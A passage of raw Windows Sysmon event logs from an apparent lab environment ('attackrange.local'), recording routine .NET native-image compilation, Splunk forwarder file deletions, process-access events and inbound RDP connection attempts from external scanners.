Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B8AA1DAFCA865DE161421837D4A6A09C,SHA256=F75F7F4B498D6F1D8DE0B4DCF92D8214A16EF64EE3D407F77E62E8381EC0E77D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050316Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:46.541{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8541731D31E01A360BB5EB9185F50B89,SHA256=6E7BB0C5BA4CE6B0926A2AACA61AA83638DFD32DADA2A5717A484417E9C8DEED,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076155Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:47.951{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEB-607E-4D0D-00000000BB01}1388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076154Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:47.936{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBEB-607E-4D0D-00000000BB01}1388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076153Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:47.936{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEB-607E-4D0D-00000000BB01}1388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000076152Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:57:47.889{A7A01FEF-EBEB-607E-4C0D-00000000BB01}2952C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b88-0\Microsoft.VisualStudio.Tools.Office.Runtime.dll2021-04-20 14:57:47.889 354300x800000000000000076151Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:46.414{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com56213-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000076150Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:45.936{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-46196-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000076149Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:47.639{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEB-607E-4C0D-00000000BB01}2952C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076148Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:47.623{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBEB-607E-4C0D-00000000BB01}2952C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076147Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:47.623{A7A01FEF-EBDA-607E-C60C-00000000BB01}35121112C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEB-607E-4C0D-00000000BB01}2952C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000076146Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:47.561{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEB-607E-4B0D-00000000BB01}6080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076145Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:47.545{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBEB-607E-4B0D-00000000BB01}6080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076144Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:47.545{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEB-607E-4B0D-00000000BB01}6080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000076143Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:57:47.514{A7A01FEF-EBEB-607E-4A0D-00000000BB01}6292C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1894-0\Microsoft.VisualStudio.Tools.Office.ContainerControl.dll2021-04-20 14:57:47.514 10341000x800000000000000076142Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:47.405{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEB-607E-4A0D-00000000BB01}6292C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076141Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:47.389{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBEB-607E-4A0D-00000000BB01}6292C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076140Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:47.389{A7A01FEF-EBDA-607E-C60C-00000000BB01}35121112C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEB-607E-4A0D-00000000BB01}6292C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000076139Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:47.342{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEB-607E-490D-00000000BB01}6084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076138Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:47.326{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBEB-607E-490D-00000000BB01}6084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076137Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:47.326{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEB-607E-490D-00000000BB01}6084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000076136Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:57:47.280{A7A01FEF-EBEB-607E-480D-00000000BB01}7136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1be0-0\Microsoft.VisualStudio.Tools.Applications.ServerDocument.dll2021-04-20 14:57:47.280 23542300x800000000000000076135Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:47.061{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=530321848A4A92710C01F18B495A3C10,SHA256=FAAA521AE3236A80F3A9BA93C11E0FB37D61E5AB0BA6B3A331D54CFA63694FB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000076134Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:47.061{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B50F9062985B15CD33D9E39933DE0609,SHA256=647B65E0FDD939E91BE62FFEC726FD408CD22B7B4B23F667645C504EB4CFBE35,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076133Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:47.014{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEB-607E-480D-00000000BB01}7136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076132Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:46.998{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBEB-607E-480D-00000000BB01}7136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076131Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:46.998{A7A01FEF-EBDA-607E-C60C-00000000BB01}35121112C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEB-607E-480D-00000000BB01}7136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 354300x800000000000000050321Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:45.239{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-60695-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050320Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:45.015{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com52167-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050319Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:47.556{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C3DD7FA4D15FBD86C30BB7FCCE35646,SHA256=BCA5FA1AABCBF7F2DA3F4B80F3147281D2BB01FA10E1C2E635B91A3A750CCBEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050318Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:47.306{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C59C8D7283AE8F070191C76C17B7D92F,SHA256=D7139BE9139D8A88F459103EB0522FCB30383ECAAE9AD0D626DAAFC0F4C4A503,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050317Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:47.306{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F05405E1BB1B8165B4698EABB514F859,SHA256=4DE171A33C055F5F79A2D156AFC170DF765D71039533621A65E3F27A6505BE31,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076198Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 